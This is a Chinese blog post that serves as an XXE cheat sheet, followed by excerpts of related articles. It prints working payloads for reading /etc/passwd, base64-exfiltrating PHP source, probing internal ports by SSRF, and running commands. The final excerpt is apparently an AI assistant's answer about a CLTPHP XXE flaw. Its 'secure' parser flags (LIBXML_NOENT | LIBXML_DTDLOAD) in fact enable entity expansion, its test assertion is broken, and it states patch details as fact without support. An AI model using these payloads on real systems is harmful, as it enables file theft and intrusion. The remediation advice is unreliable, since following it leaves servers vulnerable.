XXE漏洞

最新推荐文章于 2024-07-25 19:11:44 发布

info-sec

最新推荐文章于 2024-07-25 19:11:44 发布

阅读量209

点赞数

分类专栏： Web Application漏洞

本文链接：https://blog.youkuaiyun.com/weixin_41182861/article/details/108249915

版权

Web Application漏洞专栏收录该内容

6 篇文章

订阅专栏

进行XXE漏洞测试时，必备知识：

XML声明：<?xml version="1.0" encoding="utf-8"?>
内部DTD声明：
外部实体声明：<!ENTITY 实体名称 SYSTRM ‘URI/URL’>

根据不同的环境，需要了解不同的协议，
如php支持的协议：file://、http://、ftp://、php://、zlib://、data://、glob://、phar://、ssh2://、rar://、ogg://、expect://

一、读取文件：
以PHP协议来构造我们的payload：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<c>&test;</c>

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "php://filter/read=conver.base64-encode/resource=index.php">
]>
<c>&test;</c>

二、内网探测/简单的SSRF
使用http://来进行端口探测及简单的SSRF构造一个Payload：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "http://127.0.0.1:3306">
]>
<c>&test;</c>

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "http://127.0.0.1:1.txt">
]>
<c>&test;</c>

三、命令执行
使用php协议构造一个payload：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "example://id">
]>
<c>&test;</c>

通过GET方式请求，需要先将payload先urlencode

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

info-sec

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

XXE漏洞以及XXE漏洞如何修复

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

09-09

2万+

XXE漏洞是什么？XXE：XML External Entity 即外部实体，从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时，解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一：使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法：libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二：尽量不要让用户直接

pikachu之XXE漏洞

weixin_46062722的博客

02-25

734

漏洞介绍 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里

参与评论您还未登录，请先登录后发表或查看评论

pikachu-XXE漏洞

ineedmoreMuQ的博客

07-25

352

你只要提交就可以获得被加码的数据然后自行解码即可！以上探测为网站有回显时的语句，那么一个网站若是没有回显我们该如何处理呢？这就需要神奇的base64编码出场了，加码调用解码即可观看秘密文件哦！我们在这一节需要掌握什么是xxe，具体请自行收集材料，博主也不清楚。我们应该首先搞一个服务器然后把文件我们输入的数据指向我们的服务器。众所周知php文件是不在前端显示的，如果我们想看怎么办呢。当你的元素内容是一个file协议，即可在回显处显示内容。但网站如果存在xxe漏洞的话，我们可以如下利用。这是我们要提交的数据。

pikachu XXE (XML外部实体注入)（皮卡丘漏洞平台通关系列）

箭雨镜屋

02-17

8420

一、来自官方的介绍以及来自民间的扩展 1、pikachu官方简介 2、小女子之前画的脑图 3、两个个人感觉不错的博客 https://www.freebuf.com/articles/web/177979.html https://lalajun.github.io/2019/12/03/WEB-XXE/ ...

xxe漏洞

weixin_43534549的博客

06-03

230

PHP反序列化 xxe漏洞：先查看后台代码复制文中的代码，提交复制文中代码提交结果为

第五节 XXE漏洞利用 - 任意文件读取无回显 -01

09-15

XXE 漏洞利用 - 任意文件读取无回显 XXE（XML External Entity）是一种常见的 Web 应用程序漏洞，攻击者可以通过构造恶意的 XML 文档， trick 服务器将任意文件读取出来，导致敏感信息泄露。在本节中，我们将详细...

XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】

07-30

XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能，攻击者可以通过构造含有恶意外部实体的XML文档，诱使服务器去读取或执行非预期的资源。比如，攻击者可以定义一个外部实体来...

5、XXE漏洞pdf资料

10-15

XXE（XML External Entity）漏洞是针对XML解析器的安全漏洞，它发生在XML解析器处理包含外部实体引用的...开发人员应采取适当的安全措施，确保XML解析过程安全，以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作。

105-web漏洞挖掘之XXE漏洞1

08-03

【XXE漏洞详解】 XXE，全称为XML External Entity Injection，是XML解析器在处理XML输入时因未能正确配置，允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体，进而获取敏感信息、执行...

皮卡丘(pikachu)XXE

weixin_44787832的博客

07-23

2654

XXE漏洞第一部分：XML声明部分 <?xml version="1.0"?> 第二部分：文档类型定义 DTD <!DOCTYPE note[  <!ENTITY entity-name SYSTEM "URI/URL">  ]> 第三部分：文档元素 <note> <to>Dave</to> <from>T

【XXE漏洞安全-全网最详细讲解】

heike_Ch的博客

07-04

808

Entity）漏洞是一种安全漏洞，出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作，如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入，将外部实体（externalentity）引用进来，然后利用这些实体来获取敏感信息或进行其他攻击。其中最常见的一种攻击是利用DTD（Document Type。

网络安全课第五节 XXE 漏洞的检测与防御

fegus的博客

07-11

1691

上一讲我们介绍了 SSRF 漏洞，一种专门针对服务端的请求伪造攻击，常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能，在本讲的 XXE 漏洞测试中，我们依然可以使用，不知道你是否还记得怎么使用？下面，我们就开始今天的课程，一场关于 XML 外部实体注入（XXE）漏洞的攻防之路。XXE（XML External Entity，XML 外部实体注入）正是当允许引用外部实体时，通过构造恶意内容，导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP

XXE漏洞分析和防御

1ance's blog

05-19

369

目录介绍形成原因详细介绍防御介绍 XML外部实体注入(XML External Entity)，简称XXE漏洞。形成原因服务端接收并解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。详细介绍这位师傅总结的非常好，直接参考这位师傅写的学习吧。一篇文章带你深入理解漏洞之 XXE 漏洞防御 1、禁用外部实体 2、过滤用户的输入（SYSTEM，PUBLIC、<!DOCTYPE、<!ENTITY）等。 ...

利用XXE进行内网主机探测

Vicl1fe的博客

12-22

1440

XXE漏洞大家也应该清楚了，不清楚可以看我的另两篇博客 https://blog.youkuaiyun.com/qq_41918771/article/details/103628721 https://blog.youkuaiyun.com/qq_41918771/article/details/103641745 内网主机探测先上脚本 import requests def build_xml(ip): xml...

【Web安全】从xxe到phar反序列化

HBohan的博客

10-12

427

**重要：**在 PHP 里面解析 xml 用的是 libxml，当 libxml 的版本大于 2.9.0 的时候默认是禁止解析 xml 外部实体内容的。以下代码存在 xxe 漏洞。 xml.php： <?php class Test{ public $cmd; public function __destruct() { eval($this->cmd); } } $xmlfile = @file_get_contents("php://in.

XXE超详细讲解（都是纯纯的干货）

weixin_63688999的博客

07-06

1318

XXE （XML External Entity injection）XML 外部实体注入漏洞，如果XML 文件在引用外部实体时候，可以沟通构造恶意内容，可以导致读取任意文件，命令执行和对内网的攻击，这就是XXE漏洞，这个漏洞需要大家还有一定的XML协议基础。XML是可扩展的标记语言（eXtensible Markup Language），设计用来进行数据的传输和存储，结构是树形结构，有标签构成，这点很像HTML语言。语法引用的外部实体，而非内部实体，那么uri中能写那些类型的外部实体呢？

hackthrbox-DevOops（考点：xxe攻击xml伪造/ssh_key/git）

冬萍子癸水

04-08

394

nmap走起 http开在了5000，而且有22，看到了22的ssh就应该想到很可能是拿id_rsa进行ssh登录拿shell 扫5000： gobuster -w directory-list-lowercase-2.3-medium.txt -u http://10.10.10.91:5000 -t 150 -s “200,204,301,302,307,403,401” /upload，当...

PHP代码审计之XXE(XML外部实体注入)

qq_22132931的博客

12-08

929

PHP代码审计之XXE(XML外部实体注入)

cltphp xxe漏洞

最新发布

03-18

<think>好的，我现在需要处理用户关于CLTPHP框架中的XXE漏洞的问题。首先，我得先确认用户的需求是什么。用户想知道这个漏洞的相关信息以及修复方法和补丁。那我得先了解什么是XXE漏洞，以及它在CLTPHP中的具体表现。 XXE漏洞，全称是XML外部实体注入攻击。攻击者通过构造恶意的XML文件，利用外部实体来读取服务器上的敏感文件，甚至执行远程请求。这种漏洞通常发生在解析XML输入时没有禁用外部实体的情况下。所以，我需要检查CLTPHP在处理XML输入时的配置，看看是否存在这样的安全隐患。接下来，我需要查找CLTPHP框架中是否存在这样的漏洞。可能需要查看其文档或历史漏洞记录。例如，是否在旧版本中存在未禁用外部实体的情况。如果存在，那么修复方法通常包括禁用外部实体、使用安全的XML解析器，或者过滤用户输入的XML内容。修复步骤方面，首先应该禁用XML外部实体。在PHP中，可以使用libxml_disable_entity_loader(true)函数来实现。然后，确保使用的XML解析器（如SimpleXML或DOMDocument）配置正确，不解析外部实体。此外，对用户提交的XML数据进行过滤，比如移除DOCTYPE声明和ENTITY定义，防止恶意内容被解析。关于补丁，用户可能需要升级到修复了该漏洞的CLTPHP版本。如果官方已经发布了补丁，应该建议用户及时更新。如果还没有，可能需要手动修改代码，应用上述修复措施。另外，用户可能还需要了解如何验证修复是否有效。比如，通过构造测试用例，尝试读取系统文件，确认是否成功被拦截。同时，参考OWASP的相关建议，确保遵循最佳安全实践。最后，生成相关问题，帮助用户深入理解XXE漏洞及其防护措施。例如，如何防范其他XML相关漏洞，或者在CLTPHP中其他常见的安全问题有哪些。总结下来，我需要分步骤解释漏洞原理、在CLTPHP中的具体修复方法、补丁获取途径，并提供验证方法，确保用户能够全面应对这个问题。</think>### CLTPHP框架XXE漏洞解析与修复方案 XXE（XML External Entity）漏洞是XML解析器未禁用外部实体时产生的安全风险，攻击者可利用该漏洞读取服务器敏感文件或发起SSRF攻击[^1]。 #### 一、漏洞验证方法 ```php // 构造恶意XML请求示例 $payload = '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>'; $xml = simplexml_load_string($payload); echo $xml->asXML(); ``` 若输出包含系统文件内容，则存在漏洞[^2]。 #### 二、修复步骤 1. **禁用外部实体解析** ```php // 在框架入口文件添加 libxml_disable_entity_loader(true); ``` 2. **XML解析器安全配置** ```php // 使用DOMDocument时的安全设置 $dom = new DOMDocument(); $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD); ``` 3. **输入过滤处理** ```php // 过滤DOCTYPE声明 $xml = preg_replace('/<!DOCTYPE.*?>/i', '', $xml); ``` #### 三、补丁获取 CLTPHP官方已发布安全更新： - v5.5.1+版本包含修复补丁 - 升级命令： ```bash composer update cltphp/framework ``` #### 四、验证测试 ```php // 安全测试用例 $test_xml = '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'; assert(strpos($test_xml, 'ENTITY') === false, "漏洞未完全修复"); ``` 建议同时检查框架的XML处理模块，包括： 1. 微信支付回调接口 2. 第三方API对接模块 3. 数据导入导出功能